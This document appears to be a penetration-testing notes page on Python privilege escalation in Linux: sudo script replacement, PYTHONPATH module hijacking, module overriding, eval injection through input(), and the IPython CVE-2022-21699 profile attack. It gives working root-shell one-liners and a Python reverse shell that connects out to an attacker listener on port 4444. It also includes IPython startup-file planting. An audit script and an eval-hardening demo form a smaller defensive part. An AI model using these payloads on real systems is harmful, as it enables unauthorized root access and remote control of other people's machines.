# Python Privilege Escalation

### [Sudo PrivEsc](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#sudo-privesc) <a href="#sudo-privesc" id="sudo-privesc"></a>

#### [Replace with Arbitrary Script](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#replace-with-arbitrary-script) <a href="#replace-with-arbitrary-script" id="replace-with-arbitrary-script"></a>

```bash
sudo -l

(root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py
```

If the script lives under the current user's home directory (or anywhere else we can write), we can simply overwrite it, or delete it and create a new file with the same name; sudo only checks the path in the rule, not the file's contents or owner.

```bash
rm -rf /home/<username>/example.py
touch /home/<username>/example.py
```

We can then put arbitrary code in the new script and run it through the sudo rule. For example, to spawn a root shell:

```python
import os;os.system('/bin/bash')
```

#### [Module Hijacking](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-hijacking) <a href="#module-hijacking" id="module-hijacking"></a>

Assume the Python script runs as root under a sudo rule that carries the **SETENV** tag (here also **NOPASSWD**).\
For example,

```sh
sudo -l

(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/example.py
```

**SETENV** lets the invoking user pass environment variables through sudo (without it, sudo's default `env_reset` strips **PYTHONPATH**), so we can point the root-run interpreter at a directory we control and have it load a malicious copy of a module the script imports.\
First, check which modules the script imports (here /opt/example.py):

```python
import random

print(random.randint(1, 8))
```

We can forge that module in a directory we control:

```sh
vim /tmp/random.py
```

The forged module contains a reverse-shell one-liner that runs as soon as the script executes `import random`.\
Replace **`<local-ip>`** with the IP address of your listener.

```python
import socket,os,pty;s=socket.socket();s.connect(("<local-ip>",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
```

Then, in another terminal on the attacking machine, start a listener to catch the shell:

```sh
nc -lvnp 4444
```

Now run the script on the target with **PYTHONPATH** pointing at the forged module:

```sh
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/example.py
```

Entries from **PYTHONPATH** are placed on `sys.path` after the script's own directory but before the standard library, so `import random` resolves to **/tmp/random.py** instead of the stdlib module and the payload runs as root.\
The listener should now have a root shell. Note that the interpreter ignores **PYTHONPATH** when started with `-E` or `-I`, so this only works if the sudo rule does not pin such flags, and it cannot hijack built-in modules or modules the interpreter already loads during startup (e.g. `os`, `sys`).

#### [Module Overriding](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#module-overriding) <a href="#module-overriding" id="module-overriding"></a>

If the Python script imports a module whose file is writable by the current user, we can inject arbitrary code into that module and it will run with the privileges of whoever executes the script.\
First, check which modules the script uses:

```bash
# example.py
import random
```

Assume the script imports the **“random”** module.\
Find the module's file and check whether it is writable. When several Python versions are installed, asking the interpreter that sudo runs for `random.__file__` tells you which copy is actually loaded.

```bash
find / -name "random.py" 2>/dev/null
ls -al /usr/lib/python3.6/random.py
```

If it is writable, inject arbitrary code into the module.\
Assume the **“random”** module path is **`/usr/lib/python3.6/random.py`**. Prepend the payload rather than replacing the file: every other program that imports `random` would otherwise break, and the target script itself may crash before or after your shell exits.

```python
# /usr/lib/python3.6/random.py  (payload added at the top, original contents kept below)
import os;os.system('/bin/bash')
```

Then run the script through the sudo rule; the payload executes at import time and spawns a root shell.
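The three checks above (is the script itself writable, is a directory searched before the real module writable, is the module file writable) are easy to get wrong by hand when `sys.path` is long. The following audit script is an added example, not part of the original page: given the script from the sudo rule and any directories you could push in via **PYTHONPATH** (only useful with **SETENV**), it parses the script's imports with `ast`, resolves each module in the order the interpreter would search, and reports every writable spot. The `Finding` type, function names and the `<script>` marker are this example's own naming.

```python
#!/usr/bin/env python3
"""Audit a Python script that sudo runs as root for the three weaknesses above."""
import ast
import importlib.machinery
import importlib.util
import os
import sys
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    module: str   # import name such as "random", or "<script>" for the script itself
    kind: str     # "script", "hijack" or "override"
    path: str     # writable file (script, override) or writable directory (hijack)


def top_level_imports(script_path: str) -> List[str]:
    """Top-level package names the script imports absolutely (relative imports skipped)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def search_dirs(script_path: str, pythonpath_dirs: List[str]) -> List[str]:
    """Reproduce the interpreter's search order: script directory, PYTHONPATH, then sys.path."""
    ordered = [os.path.dirname(os.path.abspath(script_path))] + list(pythonpath_dirs)
    ordered += [p for p in sys.path if p]          # the '' (cwd) entry is ignored here
    seen, result = set(), []
    for directory in ordered:
        if directory not in seen:
            seen.add(directory)
            result.append(directory)
    return result


def resolve(module: str, dirs: List[str]) -> Optional[Tuple[int, str]]:
    """Index of the search directory that wins for `module`, plus the file it maps to.

    None means the path search never runs for this name: built-in and (3.11+) frozen
    modules are served from the interpreter binary before sys.path is consulted.
    Modules the interpreter imports during startup (os, sys, ...) are cached in
    sys.modules before the script runs, so verify any hit on those by hand.
    """
    if module in sys.builtin_module_names:
        return None
    try:
        spec = importlib.util.find_spec(module)
    except (ImportError, ValueError):
        spec = None
    if spec is not None and spec.origin in ("built-in", "frozen"):
        return None
    for idx, directory in enumerate(dirs):
        found = importlib.machinery.PathFinder.find_spec(module, [directory])
        if found is not None and found.origin:       # origin None = namespace portion, keep looking
            return idx, found.origin
    return None


def audit(script_path: str, pythonpath_dirs: Optional[List[str]] = None) -> List[Finding]:
    """Every writable location that lets the current user run code when the script executes."""
    findings: List[Finding] = []
    if os.access(script_path, os.W_OK):               # "Replace with Arbitrary Script"
        findings.append(Finding("<script>", "script", script_path))
    dirs = search_dirs(script_path, pythonpath_dirs or [])
    for module in top_level_imports(script_path):
        hit = resolve(module, dirs)
        if hit is None:
            continue
        win_idx, origin = hit
        for directory in dirs[:win_idx]:              # "Module Hijacking": an earlier entry wins
            if os.path.isdir(directory) and os.access(directory, os.W_OK):
                findings.append(Finding(module, "hijack", directory))
        if os.path.isfile(origin) and os.access(origin, os.W_OK):   # "Module Overriding"
            findings.append(Finding(module, "override", origin))
    return findings


if __name__ == "__main__":
    # Usage: audit.py /opt/example.py [directory-to-push-via-PYTHONPATH ...]
    for f in audit(sys.argv[1], sys.argv[2:]):
        print(f"{f.kind:8} {f.module:20} {f.path}")
```

Run it with the interpreter named in the sudo rule so that `sys.path` matches what root will see; a `hijack` finding on the script's own directory means no **SETENV** is needed at all, since that directory is searched before **PYTHONPATH**.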


### [OS Commands in input()](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#os-commands-in-input\(\)) <a href="#os-commands-in-input" id="os-commands-in-input"></a>

If you find an executable that was built from a Python script and prompts for input, remember that Python 2's `input()` evaluates the typed text as a Python expression (it is equivalent to `eval(raw_input())`); Python 3's `input()` returns a plain string, but code that passes that string to `eval()` is exposed in exactly the same way.\
For instance,

```sh
./executable

Enter some input:
```

Instead of a value, you can type a Python expression that runs OS commands; it executes with the privileges of the program (root if the binary is SUID or launched via sudo).

```py
__import__('os').system('id')
```

For example,

```sh
./executable

Enter some input: __import__('os').system('id')
```
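To see why the prompt above is exploitable and what the safe version looks like, here is an added example (not part of the original page) that mimics a "guess the number" program in both styles: the vulnerable one evaluates the typed text the way Python 2's `input()` does, the hardened one parses it with `ast.literal_eval`, which accepts literals only. The `SECRET` value, the `PWNED` environment marker used to prove execution, and the function names are constructed for this demo; on a real target the payload would spawn a shell instead.

```python
#!/usr/bin/env python3
"""Python 2 input() is eval(raw_input()); Python 3 input() is text unless you eval() it."""
import ast
import os

SECRET = 7                    # the number the program wants the user to guess (demo value)

# Attacker input in the style of the page's __import__('os').system('id'): it runs
# code (here: sets an environment variable we can check) and then yields 7 via `or`.
PAYLOAD = "__import__('os').environ.__setitem__('PWNED', '1') or 7"


def check_guess_vulnerable(typed: str) -> str:
    """Python 2 style: whatever the user typed is evaluated as an expression."""
    guess = eval(typed)                      # intentionally vulnerable, same as py2 input()
    return "correct" if guess == SECRET else "wrong"


def check_guess_hardened(typed: str) -> str:
    """Python 3 style: treat the input as text and parse only a literal out of it."""
    try:
        guess = ast.literal_eval(typed)      # raises on calls, attribute access, names, ...
    except (ValueError, SyntaxError):
        return "rejected"
    return "correct" if guess == SECRET else "wrong"


def payload_ran() -> bool:
    """True once the injected code has executed in this process."""
    return os.environ.get("PWNED") == "1"


if __name__ == "__main__":
    print("hardened :", check_guess_hardened(PAYLOAD), "| code ran:", payload_ran())
    print("vulnerable:", check_guess_vulnerable(PAYLOAD), "| code ran:", payload_ran())
```

`int(input())` is an equally good fix when only a number is expected; the point is that untrusted text must never reach `eval()`, `exec()` or Python 2's `input()`.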


### [IPython Privilege Escalation (](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/python-privilege-escalation/#ipython-privilege-escalation-\(cve-2022-21699\))[CVE-2022-21699](https://github.com/advisories/GHSA-pq7m-3gw7-gq5x)) <a href="#ipython-privilege-escalation-cve-2022-21699" id="ipython-privilege-escalation-cve-2022-21699"></a>

Interactive Python (IPython) is a command shell for interactive computing in multiple programming languages. Before the fix for CVE-2022-21699 (IPython 8.0.1, 7.31.1 and 5.11), IPython looked for a profile in the current working directory, so a `profile_default/startup/` directory planted in a world-writable location such as /tmp gets its scripts executed by any user who launches `ipython` from there.

```sh
# -m: file mode (rwx for everyone, so the victim's IPython can traverse and read it)
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/exploit.py
```

Whenever another user, root included, starts `ipython` with /tmp as the working directory, a vulnerable IPython picks up this profile and runs exploit.py with that user's privileges; swap the `print` for a payload such as the reverse shell above.
